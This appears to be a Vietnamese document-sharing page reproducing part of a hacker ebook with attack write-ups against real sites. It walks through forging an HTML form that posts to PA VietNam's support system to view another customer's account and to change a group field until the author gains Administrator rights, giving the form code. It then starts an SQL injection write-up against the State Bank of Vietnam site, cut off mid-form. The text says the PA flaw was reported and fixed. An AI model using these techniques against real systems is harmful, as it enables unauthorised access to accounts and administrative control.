1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 314 pps

6 66 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Hacker Professional Ebook Part 314 Pps
Trường học Trường Đại Học Công Nghệ Thông Tin
Chuyên ngành Công Nghệ Thông Tin
Thể loại Tài liệu
Năm xuất bản 2023
Thành phố Hồ Chí Minh
Định dạng
Số trang 6
Dung lượng 167,12 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

- Các bạn đọc xong nhớ báo cho PA dum mình nha , đừng có phá họ làm gì Nếu ai có hứng thú muốn xem tiếp thì hãy đợi : "Hack PAVIETNAM phần III " Chào các bạn!. Trước khi vào vấn đề các b

Trang 1

<table border="0" align="center">

<tr>

<td class="color_2">&nbsp;</td>

<td class="color_2"><strong>DANG NHAP </strong></td>

</tr>

<tr>

<td>Ma khach hang </td>

<td> <div align="center">

<input name="username" type="text" size="20" tabindex="1">

</div> <div align="center"> </div></td>

</tr>

<tr>

<td></td>

<td>

</td>

</tr>

<tr>

<td>&nbsp;</td>

<td> <input name="Submit" type="submit" class="submitbutton" value="Dang nhap"> </td>

</tr>

</table>

</form>

Lưu file login.html vào PC của ta

Sau đó đăng nhập vào SUPPORT của PA -> gọi file login.html ngay trên cửa sổ trinh duyệt mà ta mới vừa đăng nhập !

Oái oái cái file login lúc nãy ta tạo không có ô nhập pass vậy trời -> thôi thì nhập user không vậy ,vi dụ : pa-2503

-> Enter thử xem ! -> oái nó báo " Mật khẩu không đúng " -> làm sao bây giờ ->

cứ nhấn OK ->

Sau khi nhấn OK , nhìn lại thấy nó đưa ta trở về trang "index.php" (trang chủ) ->

Trang 2

Khà khà -> nhưng lần này không như lần trước -> Mã khách hàng hiện lên là : " pa-2503 " và tất nhiên là những domain và hosting của khách hàng này củng hiện

ra luôn -> Bây giờ làm gì nữa đây -> hi hi hi khó quá

Phần kết :

- Mức độ lỗi cực kỳ nguy hiễm !

- Các bạn đọc xong nhớ báo cho PA dum mình nha , đừng có phá họ làm gì

Nếu ai có hứng thú muốn xem tiếp thì hãy đợi : "Hack PAVIETNAM phần III "

Chào các bạn ! Hôm nay chúng ta sẽ tiếp tục đi vào nghiên cứu về hệ thống

SUPPORT của PA VietNam !

Trước khi vào vấn đề các bạn hãy tham khảo qua:

Hack PA VIETNAM phần I và Hack PA VIETNAM phần II

Nào chúng ta cùng đi vào vấng đề !

Sau bài viết Hack PA phần II mình có hứa với các bạn về bài viết phần III -> chính

vì lời hứa này làm phải chạy đôn chạy đáo -> kiếm cho được cái lỗi để viết tiếp phần III -> khổ quá !

Lần trước báo cho PA 2 bug nguy hiểm , nên họ đã cẩn thận hơn rất nhiều ! -> trùi

ui làm sao bây giờ

-> tìm bug mà chẳng có source để nghiên cứu thì làm sao mà tìm bây giờ !

Định bụng chạy lên công ty của PA xin luôn cái Source về nghiên cứu cho dễ -> nhưng nghĩ lại làm biến quá ! -> thôi thì bật PC lên nghiên cứu thôi !

http://support.pavietnam.net -> Enter 1 phát -> đăng nhập vào hệ thống Support của PA

Lướt qua rồi lướt lại chẳng thấy cái gì đáng chủ ý cả -> buồn ghê gớm !

Trang 3

Chẳng biết làm gì nữa -> he he -> buồn wá quay qua lục lại những bài viết về Hack

PA của mình đọc lại chơi -> xem thử có khuyết điểm nào không

Xem đi rồi xem lại thấy những bài viết của mình cũng tạm tạm -> nhưng chưa tìm được khuyết điểm trong bài viết của mình thì lại thấy khuyết điểm của PA

VietNam trước rùi ! -> thú vị nữa đây !

Nếu đã đọc qua bài viết phần I -> bạn nào tò mò thì khi nhìn vào cái hình minh hoạ

sẽ thắc mắc ngay (xem hình cái đã !) :

user posted image

Các bạn đã xem lại hình rùi đó ! -> như vậy có gì đâu mà théc méc ta !

-> Khà khà có đấy -> ta hãy nhìn kỹ lại và để ý đến cái dòng cuối cùng -> có dòng chử " thuộc nhóm " -> trùi ui cái đây để làm vậy ta

-> chắc nó muốn phân biệt giữa khách hàng và ai đó !

-> nhưng mà ở đây là khách của PA thì còn ai nữa đây -> không ai cả , ngoại trừ lão mà trả lời câu hỏi của khách hàng trong support !

-> Và lão này tất nhiên là có quyền nhiều hơn là khách hàng bởi lão xem được tất các yêu cầu của khách hàng mà -> vậy lão là ADMIN rùi -> hi hi

-> Như vậy là chúng ta đã giải đáp được théc méc rùi đó -> bây giờ làm nữa đây ! -> Chả biết làm gì hết -> ngoài chuyện ngồi ngẫm nghĩ !

Bây giờ ta view source lên xem lại ! -> khà khà

Các bạn hãy tìm đến ô check box của dòng chử " Thuộc nhóm "

Chính là cái thẻ này đây :

<input name='mgroup' value='1' type='radio' CHECKED>

Chúng ta hãy suy luận thêm một tý :

"mgroup" có giá trị là "1" thì sẽ là khách hàng -> vậy "mgroup" có giá trị bao

nhiêu thì sẽ là ADMIN

Trang 4

-> giá trị này có lẽ sẽ gần con số "1" , chứ chẳng lẽ

-> Vậy có thể bằng "-1" , "0" , hoặc "2" ,hoặc "3"

-> trùi ui -> bây giờ phải thử cái đã !

Tạo một file test.html có nội dung như sau:

CODE

<form action="http://support.pavietnam.net/post.php" method="post">

<input name='mgroup' value=''>

<input name="upid" value='Mã khách hàng của ta' type="hidden">

<input name="pro" type="submit" class="submitbutton" value="&nbsp;Thay đổi&nbsp;">

</FORM>

Lưu lại và chạy nó lên bằng trình duyệt mà ta đã login -> sau đó ta bắt đầu nhập giá trị mà ta đã suy luận ở trên -> trui ui mệt wá

-> Nhập con sô đầu tiên "-1" -> submit -> xong nó mất luôn cái chử khách hàng -> chẳng sao cả -> ta log out và login lại là được

> Sau 3 lần test > vẫn không có gì hết > giờ đến lần thứ tư giá trị là con số "3"

-> Submit thử coi > khà khà khà

Sau khi logout và login lại -> điều thú vị đã xãy ra -> nhìn lại thấy ta đang thuộc nhóm Administrator -> Tức có quyền cao nhất !

Phần kết :

" Đừng bao giờ bỏ qua nhưng chi tiết dù có là nhỏ nhoi -> đôi khi nó lại có ích cho

ta "

-> mức độ lỗi rất nguy hiễm

-> PA VietNam đã fix

"Nếu các bạn có nhã hứng hãy đoán xem hack PA VietNam phần IV"

- KeHieuHoc - HCEGROUP -

Trang 5

Ngân hàng nhà nước Việt Nam bị hack như thế nào ??

Hacked by langtuhaohoa ( thx my friend WinDak )

hề hề ! Tại nghe đâu phong phanh là " Ngân Hàng Nhà Nước Việt Nam (

www.sbv.gov.vn )" bị dính Sql inject thấy chữ ngân hàng cũng tính mò dô xem xem thế nào lượng đi lượn lại vài dòng thấy chã có url nào khai thác được cả ! híc ! Thấy nãn nãn !

Đang xem thì thấy mấy cái input dạng select nhìn nhìn hồi nghĩ thôi thữ đại xem sao biết đâu được

Chọn đại cái : http://www.sbv.gov.vn/home/hethongTCTDHT.asp

thấy cái select Tỉnh/Thành Phố thữ xem sao ! View source thấy 1 form như thế này :

Code:

<form name="Tim" method="post" action="hethongTCTDHT.asp"

autocomplete="on">

<p align="right">Tỉnh / Thành phố:

<select size="1" name="lstTinh" style="font-family: Times New Roman; background-color:#FFFFFF; font-size:12pt" onchange="document.Tim.submit()"> <option value="ALL">Tất cả các tỉnh thành</option>

<option value="DANANG">Đà Nẵng</option>

<option value="DACLAC">Đắc Lắc</option>

<option value="DACNONG">Đắc Nông</option>

<option value="DONGNAI">Đồng Nai</option>

<option value="DONGTHAP">Đồng Tháp</option>

Ngày đăng: 04/07/2014, 12:20